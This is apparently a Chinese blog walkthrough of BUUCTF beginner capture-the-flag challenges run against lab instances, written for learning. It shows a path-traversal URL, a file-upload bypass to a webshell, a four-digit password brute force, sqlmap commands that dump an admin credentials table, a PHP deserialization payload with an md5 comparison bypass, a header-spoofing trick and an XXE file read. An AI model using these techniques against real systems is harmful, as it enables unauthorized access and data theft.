相关推荐recommended
【网络安全CTF】BUUCTF(Basic篇)
作者:mmseoamin日期:2023-12-13

Linux Labs

解题思路:已给用户名密码,直接用ssh工具连接即可获取flag

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第1张【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第2张

查找flag在跟下

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第3张

提交完成。

BUU LFI COURSE 1

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第4张

访问链接:为php代码审计题,看题目要求构造GET请求读取文件

http://9a7d4988-99f9-4c29-88d8-600e19887723.node4.buuoj.cn:81/?file=/…/…/flag

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第5张

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第6张

Upload-Labs-Linux 靶场

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第7张

访问链接:为uploab-labs靶场,这个共有20关过一关可获取flag。

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第8张

选择第一关:查看代码发现为前端js限制文件类型,这种直接使用抓包进行绕过

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第9张

准备shell木马文件:


修改扩展名为.jpg 或.png或.gif

文件上传抓包:

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第10张

修改扩展名为php

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第11张

文件存放位置:

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第12张

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第13张

使用蚁剑链接

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第14张

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第15张

成功获取flag,其他关卡不在说明,通关思路都为上传绕过。

BUU BRUTE 1

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第16张

一个登陆框:

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第17张

随便输入账号密码:

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第18张

提示用户名错误:

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第19张

试试常用用户名admin、root、administrator等

发现使用admin作为用户名,提示密码为四位数字。

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第20张

使用暴力破解:

使用字典生成器生成4位数密码:

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第21张

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第22张

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第23张

密码破译为:6490

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第24张

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第25张

BUU SQL COURSE 1

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第26张

明显的sql注入

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第27张

使用sqlmap直接爆数据库

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第28张加参数 -dbs

sqlmap.exe -u “http://b36e1058-d0a1-450b-b960-cf2f1d4a79bd.node4.buuoj.cn:81/backend/content_detail.php?id=1” -dbs

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第29张

其中news和test比较显眼,查news数据库

sqlmap.exe -u “http://b36e1058-d0a1-450b-b960-cf2f1d4a79bd.node4.buuoj.cn:81/backend/content_detail.php?id=1” -D news --tables

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第30张

查看admin表内字段

sqlmap.exe -u “http://b36e1058-d0a1-450b-b960-cf2f1d4a79bd.node4.buuoj.cn:81/backend/content_detail.php?id=1” -D news -T admin --columns

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第31张

sqlmap.exe -u “http://b36e1058-d0a1-450b-b960-cf2f1d4a79bd.node4.buuoj.cn:81/backend/content_detail.php?id=1” -D news -T admin -C id,password,username --dump

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第32张

admin 加密码登陆注意这里不是md5加密,开始看错了,解半天没解出发现是明文存储的,无语。

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第33张

BUU CODE REVIEW 1

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第34张

代码审计:

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第35张

代码片段:

correct = base64_encode(uniqid());  //uniqid() 函数基于以微秒计的当前时间,生成一个唯一的 ID,base64_encode为转换为bash64编码
           if($this->correct === $this->input) {  /判断两个属性是否全等
                   echo file_get_contents("/flag");  //若全等,则打印根目录下的flag
           }
       } catch (Exception $e) {
       }
   }
}
if($_GET['pleaseget'] === '1') { //判断pleaseget==='1'&&pleasepost==='2'&&md1!=md52&&md5(md51)==md5(md52)
    if($_POST['pleasepost'] === '2') {
        if(md5($_POST['md51']) == md5($_POST['md52']) && $_POST['md51'] != $_POST['md52']) {
            unserialize($_POST['obj']);
        }
    }
}

第二段代码get参数简单为

http://IP/?pleaseget=1

第一段代码使用空数组绕过,给POST参数

pleasepost=2&md51=QNKCDZO&md52=s155964671a&obj=O:3:"BUU":2:{s:7:"correct";s:0:"";s:5:"input";R:2;}

此题详解可以看:https://blog.csdn.net/weixin_43965597/article/details/126381171

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第36张

sqli-labs

参考之前写的:https://blog.csdn.net/qq_39583774/article/details/120722112?spm=1001.2014.3001.5501

BUU UPLOAD COURSE 1

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第37张

上传实验

这里我传的docx的文件,可以看到变成了jpg的格式

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第38张

并看不到文件内容

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第39张

使用抓包工具修改包:

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第40张

尝试连接:

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第41张

测试连接失败:

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第42张

使用其他方式,发现这里不对,上传一个phpinfo发现能够执行,但是执行的jpg格式。

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第43张

既然能够执行php那我们直接写一个php打印flag即可。

$output
"; ?>

上传直接访问即可拿到flag

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第44张

BUU BURP COURSE 1

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第45张

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第46张

打开后直接显示只能本地访问,本地ip的由X-Forwarded-For和X-Real-IP进行构建

这里是使用的X-Real-IP构建的

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第47张

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第48张

BUU XXE COURSE 1

XXE漏洞是外部实体注入攻击

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第49张

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第50张

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第51张

用burp抓包,这里是个xml的提交

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第52张

我们在这定义了一个实体 xxe,它将指向/flag 文件,然后我们在 XML 数据中使用 &xxe; 引用这个实体,这样攻击者就可以将该文件中的内容读取到 HTTP 响应中。


]>

  &xxe;
  test

【网络安全CTF】BUUCTF(Basic篇),在这里插入图片描述,第53张